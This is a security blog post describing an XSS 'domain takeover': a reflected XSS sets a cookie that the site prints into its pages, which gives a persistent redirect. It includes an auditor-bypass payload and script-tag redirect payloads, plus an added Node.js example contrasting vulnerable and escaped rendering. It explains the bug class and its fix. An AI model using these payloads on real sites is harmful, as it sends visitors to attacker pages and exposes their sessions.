XSS for domain takeover
TLDR
(with thanks to CapnWarhol for the summary)
- If you can execute XSS code on a site, you can set cookies
- If you can set cookies, there may be one which outputs in-page on every request
- If you save script in that cookie, you can send <script>window.location.href="http://my-website.com/"</script> with every infected request, and functionally "take over" the domain.
Who doesn’t love XSS? Simple to find, simple to execute, and sometimes simple to bypass XSS auditors.
For bypassing the Chrome auditor: if the XSS is printed directly inside a <script> tag, it'll bypass the XSS auditor. Example: index.php?value=123
Prints into HTML: <script>var value='123';</script> - so if we use index.php?value=k'-alert(0)-'k, then our XSS will execute, bypassing all auditors.
Firefox is simple: no XSS protection. Safari (for mobile users) is typically the same as Chrome and blocks most stuff, and IE? Well, who uses IE.
C'mon, show me the XSS domain takeover
Ok so onward to how XSS can take over domains! First, we must find a vulnerable cookie that is printed into the DOM of the HTML, and for this example we're going to use InstaShag.com. In the screenshot below, we can see that if the cookie "site" is set to XSS, it'll be printed into the DOM of the HTML. This is our vulnerable cookie.
Notice how it also sets the cookie value back to the XSS? So this is persistent. Brilliant. Now we need XSS to set this cookie.
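Here is the reflected-cookie pattern from above (the cookie value printed into an inline <script> string, as in the index.php example) modelled in Node.js, as an added example that is not code from the original post: the vulnerable rendering sits beside a hardened one that keeps the same payload inert. The cookie name "site" and the break-out payload are the post's; the function names and the sample Cookie header are assumptions.

```javascript
// Added example, not code from the original post. Models the vulnerable
// cookie-to-DOM flow: the "site" cookie (name from the post) is written into
// an inline <script> string literal. renderUnsafe() reproduces the bug,
// renderSafe() shows the fix.

// Minimal Cookie-header parser: "a=1; site=xyz" -> { a: "1", site: "xyz" }.
function parseCookieHeader(header) {
  const jar = {};
  for (const part of (header || "").split(";")) {
    const idx = part.indexOf("=");
    if (idx < 0) continue;
    const name = part.slice(0, idx).trim();
    let value = part.slice(idx + 1).trim();
    try { value = decodeURIComponent(value); } catch (e) { /* keep raw */ }
    if (name) jar[name] = value;
  }
  return jar;
}

// Escape a value for use inside a JavaScript string literal that lives in an
// HTML <script> element. JSON.stringify handles quotes and backslashes; "<"
// and the U+2028/2029 line terminators are escaped as well, so the value can
// neither terminate the <script> element nor break the script's syntax.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Vulnerable: raw concatenation, the same pattern as the post's index.php.
function renderUnsafe(cookieHeader) {
  const site = parseCookieHeader(cookieHeader).site || "";
  return "<script>var site='" + site + "';</script>";
}

// Hardened: the cookie value is always a single well-formed string literal.
function renderSafe(cookieHeader) {
  const site = parseCookieHeader(cookieHeader).site || "";
  return "<script>var site=" + jsStringLiteral(site) + ";</script>";
}

// Constructed request carrying the post's own break-out payload.
const SAMPLE_COOKIE = "sessionid=abc123; site=k'-alert(0)-'k";
console.log(renderUnsafe(SAMPLE_COOKIE)); // alert(0) is live code here
console.log(renderSafe(SAMPLE_COOKIE));   // still an inert string
```

Encoding the value is the fix for the reflection; the cookie setting itself still needs to happen only in response to a legitimate, validated choice, otherwise the page keeps echoing whatever an attacker stored.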
5 mins later…
That was easy! Now let's create a script to set the cookie. (With thanks to Google, because I'm too lazy to code JS.)
So this will remove the cookie and re-set it to our XSS. Now let's visit Instashag.com and see what happens…
So a simple XSS just injected XSS into the cookie, and now anyone who visits my site and then visits instashag.com will have the XSS executed.
Note: They only have to visit my site ONCE to have the XSS injected to the cookie. From then on anytime they visit Instashag, XSS will execute (if you set the cookie length to expire in like a year or w/e).
So how did you take over the domain?
Set the XSS to <script>top.location.href='http://www.yoursite.com/';</script> and they'll be instantly redirected. :)
So is this bad?
Well, of course. Many companies who run bug bounties tend to pay low amounts because it's "nothing special". XSS exists on so many sites. Imagine if your bank had XSS on it (as well as a vulnerable cookie), and you were just browsing the internet minding your own business. Behind the scenes, XSS could have executed without you knowing. Now when you try to visit your bank, you could be redirected to a malicious site. Bad, huh? But of course, they could also have stolen your session cookies, etc.